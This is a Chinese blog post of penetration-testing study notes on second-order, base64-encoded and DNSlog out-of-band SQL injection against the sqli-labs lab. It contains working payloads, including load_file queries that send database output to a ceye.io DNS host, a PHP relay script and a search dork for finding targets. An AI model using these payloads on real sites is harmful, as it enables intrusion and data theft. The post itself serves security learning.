第17天-WEB 漏洞-二次,加解密,DNS 等注入

已于 2022-03-14 20:29:17 修改
阅读量852 收藏 1
点赞数
分类专栏: 2020小迪安全—渗透测试学习笔记 文章标签: 前端 安全 web安全
于 2022-03-01 12:05:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MCTSOG/article/details/123202650
版权

#加解密,二次,DNSlog 注入

注入原理,演示案例,实际应用(中转注入)

DNSlog:解决了盲注不能回显数据,效率低的问题

http://127.0.0.1:8080/sqlilabs/less-2/?id=-1 and if((select load_file(concat(’\\’,(select

version()),’.1t7i2f.ceye.io\abc’))),1,0)–+

D:\Python27\python.exe dnslogSql.py -u “http://127.0.0.1:8080/sqlilabs/Less-9/?id=1’ and ({})–+”

涉及资源:

http://ceye.io/

https://github.com/ADOOO/DnslogSqlinj

<?php $url='http://xxxx/job_bystjb/yjs_byszjs.asp?id='; $payload=base64_encode($_GET['x']); echo $payload; $urls=$url.$payload;file_get_contents($urls); echo $urls; ?>

二次注入原理
请添加图片描述

实战情况需要搭配源码进行代码审计,扫描工具是扫不出来的!

sqlilabs-less21-cookie&加解密注入

(需要加密才能进行注入)代码中有解密

请添加图片描述

admin’ or updatexml(1,concat(0x7e,(version())),0) or ’

base64加密

YWRtaW4nICBvciB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwodmVyc2lvbigpKSksMCkgb3IgJw==

请添加图片描述

admin’ or updatexml(1,concat(0x7e,(database())),0) or

base64加密

YWRtaW4nICBvciB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoZGF0YWJhc2UoKSkpLDApIG9yICc=

请添加图片描述

MQ== (base64解密为1)

inurl:id=MQ==

现实中许多网站中都有加密

请添加图片描述

请添加图片描述

加解密注入:

一 判断出对方的参数采用了加密

二 采用了什么加密形式,(加密算法)

三 拼接注入语句然后加密进行注入

sqlilabs-less24-post 登陆框&二次注入

请添加图片描述

然后修改superman’# 的密码为666666

结果修改后

Superman的密码变成了6666666,superman’# 的密码没变

请添加图片描述

请添加图片描述

这是因为

请添加图片描述

修改密码时,预先存入的数据(‘#)在进行数据拼接的时,把后面的语句注释掉了!

也可以爆数据库版本如:在

请添加图片描述

实际中会对用户名长度进行限制,前端限制(自行修改突破)后端限制就G了

sqlilabs-less9-load_file&dnslog 带外注入

高权限注入

注册一个ceye账号;

http://ceye.io/

请添加图片描述
select * from users where id=1 and if((select load_file(concat(’\\’,(select version()),’.jepxiv.ceye.io\abc’))),1,0);

select * from users where id=1 and if((select load_file(concat(’\\’,(select database()),’.jepxiv.ceye.io\abc’))),1,0);

在这里插入图片描述

dnslog工具

https://github.com/ADOOO/DnslogSqlinj

请添加图片描述

IsecNoob
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
17WEB漏洞-SQL注入二次,加解密,DNS注入1
08-03
本文将深入探讨二次注入加解密技术以及DNSlog注入的概念、原理,并通过具体案例和实际应用来阐述这些技术如何被利用。 **SQL注入**是攻击者通过在Web应用程序的输入字段中插入恶意SQL代码,从而控制或篡改数据库...
SQL加解密注入详解
永远是少年
07-25 1431
继续给大家介绍Linux运维相关知识,本文主要内容是SQL加解密注入。 一、SQL加解密注入原理 二、SQL加解密注入靶场逻辑介绍 三、SQL加解密注入实战
web,sql注入二次加解密dns注入等(17
san3144393495的博客
04-26 342
这个二次注入,和前面讲到那些注入有一些小的区别,而是产生的地方区别,从查询方式我们可以根据网站的应用功能判断他是何种查询方式,还有其他的,但是他们但是在注入的原则什么进行一些编译,比如说提交方式,查询方式,参数类型等一些的不同,但这个二次注入,有不同是无法通过扫描工具或代码自己手工去测试出来的,只能从网站源代码里面才能发现二次注入漏洞,从前端或黑盒测试是看不到这种漏洞的,有也找不到,这也是它的特点,传出来是什么东西啊,肯定有问题。常规注入的话,加解密就是多了一层按照他的加密方式去提交。这是注入扩展里面的,
web漏洞-渗透测试-加密解密注入-二次注入-DNSlog带外注入-中转注入-附SQLi-LABS靶场操作示例
ran的博客
01-18 716
加解密注入就是比常规注入多了一步,需要对网站加密方式进行还原,在注入过程中,所有的注入语句要按照网站的加密方式进行加密后再进行注入DNS(Domain Name System,域名系统),因特网上作为域名和IP地址相互映射的一个分布式数据库,能够使用户更方便的访问互联网,而不用去记住能够被机器直接读取的IP数串。通过主机名,最终得到该主机名对应的IP地址的过程叫做域名解析(或主机名解析)。sqlmap工具;BurpSuit抓包;SQLi-LABS靶场;
17、SQL注入二次加解密DNS注入
最新发布
山兔的博客
07-15 395
在sqlmap里面的tamper插件库,你如果说懂python,二次开发是没有问题的,或者我们自己去写个插件放在里面也可以直接去引用的,比如安全狗的,写个sqldog.py,那就是根据安全狗的绕过规则写个py文件到里面去,我们就可以根据sqlmap对目标进行工具上的注入并且绕过安全狗。在后续的渗透测试过程中,我们会发现,你即使后门传上去,不见得就会连上去,因为还会有各种各样的问题,但是这个问题出现的机率也不会很高,我们从后门传上去的脚本,它不解析,传到后门,它也无法连接。第二点,对方的加密形式;
SQL注入渗透与攻防(十)之加解密注入和堆叠注入
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-23 893
Base64是网络上最常见的用于传输8Bit的编码方式之一,Base64就是一种基于64个可打印字符来表示数据的方法。
华安解密之DDoS攻防-03DNS原理篇DNSReplyFlood
02-24
DNS协议的基础知识我们本篇就不重复介绍了,大家可以看上一篇的介绍。今我们直接从DNSreplyflood的攻击原理入手。前面我们也讲过,DNS查询过程通常都是基于UDP协议的,UDP协议是无连接状态的。所以这一弱点很容易...
dnspod-api-php-web:DNSPod API PHP Web示例
05-29
功能说明 ... 已调整为只支持通过 Token 登录,请到 DNSPod 用户中心创建 API Token 获取 Token ID...$ composer create-project likexian/dnspod-web DEMO 请打开 目录查看相关截图。 LICENSE Copyright 2011-2021 Li Kex
dnscrypt-proxy:dnscrypt-proxy 2-灵活的DNS代理,支持加密的DNS协议
02-20
灵活的DNS代理,支持现代加密DNS协议,例如 , 和 。 ←从这里开始 可作为大多数操作系统和体系结构的源代码和预构建的二进制文件(请参见下文)。 特征 DNS流量加密和身份验证。 使用TLS 1.3,DNSCrypt和匿名DNS...
CTF 加密 解密 SQL注入 BASE64
03-19
CTF 加密 解密 SQL注入 BASE64
WEB漏洞-SQL注入二次,加解密,dns注入
xhscxj的博客
01-15 1006
加解密 此处Cookie中的uname的参数值为base64加密的密文,所以在尝试注入的时候,要把注入语句也进行加密 二次注入 当网站有类似注册修改等功能时有可能产生,只能白盒测试 例:当用户注册了一个用户名为admin’ and 1=1–+类似的语句,在注册时sql语句进行了单引号过滤,没有报错,写入数据库中。但当用户想修改用户名时,修改的sql语句update没有进行过滤,导致单引号闭合。就会产生注入 当数据库中有一个admin用户,我注册一个admin’#用户。我通过修改admin’#的密码可以把
加密与解密:注入
weixin_49777720的博客
03-16 386
文章目录DLL注入放发通过干预输入表处理过程加载目标DLL静态修改PE输入标法进程创建期修改PE输入表法输入表项DLL替换法改变程序运行流程使其主动加载目标DLLCreateRemote Threadz法利用系统机制加载DLL DLL是Windows平台提供的一种模块共享和重用机制,它本身不能直接独立执行,但可以被加载到其他进程中间执行,对灵活实现各种补丁功能非常有帮助。 DLL注入放发 程序加载DLL时间: 在进程创建阶段加载(静态输入) 调用LoadLibrary主动加载(动态加载) 由于系统机制的要
小迪渗透测试学习笔记(十七)WEB漏洞-二次加解密DNS注入
萧丶的博客
02-06 838
1. 加解密注入 get或者post的参数采用了base64等加密方式将数据进行加密,在通过参数传递给服务器,eg:www.xxx.com/index.php?id=MQ== 加密部分:MQ== 解密结果:1 案例:sqlilabs-less21 burp抓包 forward,可以看到uname=YWRtaW4%3D %3D 为 = ,base解密为admin 将uname的值改为注入语句: admin' or updatexml(1,concat(0x7e,(database())),0)
SQL注入二次加解密DNS注入
m0_48907714的博客
04-02 4715
加解密二次DNSlog注入 加解密 实例 sqli-labs-master/Less-21/ 登录抓包 抓包结果 将uname的内容一看就是加密内容,我们进行解密,我们看解密结果 我们将%3D是ascii码的‘=’号,我们将其修改回来 这时我们需要进行cookie注入时就需要进行加密注入 uname=YWRtaW4ZIGFuZCAnMScgPScyJyAtLSs= 注入报错了,存在注入 sqlmap也存在base64的插件 sqlmap.py -u “http://127.0.0.1/sql
写bat脚本双击执行
qq_35911118的博客
04-08 2761
@echo off           不显示后续命令行及当前命令行 dir c:*.* >a.txt       将c盘文件列表写入a.txt call c:\ucdos\ucdos.bat    调用ucdos echo 你好            显示"你好" pause              暂停,等待按键继续 rem 准备运行wps         注释:准备运行wps cd ucdos            进入ucdos目录 wps               运行wps @echo
SQL加解密注入
qq_38205354的博客
06-17 344
SQL加解密注入 SQL注入加解密注入 即get或者post的参数采用了base64等加密方式将数据进行加密,在通过参数传递给服务器,eg:www.xxx.com/index.php?id=MQ== 加密部分:MQ== 解密结果:1 相当于id=1 如果要写注入语句,应该先构造语句,再base64加密, id=1 and 1=1 base64加密结果:MSBhbmQgMT0x 语句为:www.xxx.com/index.php?id=MSBhbmQgMT0x ...
17)网络安全:cookie注入二次注入DNSlog注入、中转注入、堆叠注入的原理及注入过程
02-26 3405
原理、靶场、步骤、注入
解决websocket不能@Autowired注入问题
胡榕昆的博客
10-12 863
在项目中,遇见需要在websocket中注入其他的类,最后发现通过@Autowired无法注入,最后网上搜寻了下答案,大致原因为spring管理的都是单例(singleton),和 websocket (多对象)相冲突。因为websocket是多实例单线程的,而websocket中的对象在@Autowried时,只有整个项目启动时会注入,而之后新的websocket实例都不会再次注入,故websocket上@Autowried的bean是会为null的 最后解决办法 ...
微软AZ-104认证考试:私有DNS与高可用部署策略
AZ-104 考试涵盖了一系列关于 Azure 环境管理、网络配置、存储、虚拟机部署以及高可用性等方面的知识。以下是两个示例问题及其详细解答: 1. **问题1:Azure DNS 私有区域注册** - 题目涉及 Azure 虚拟机(运行 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值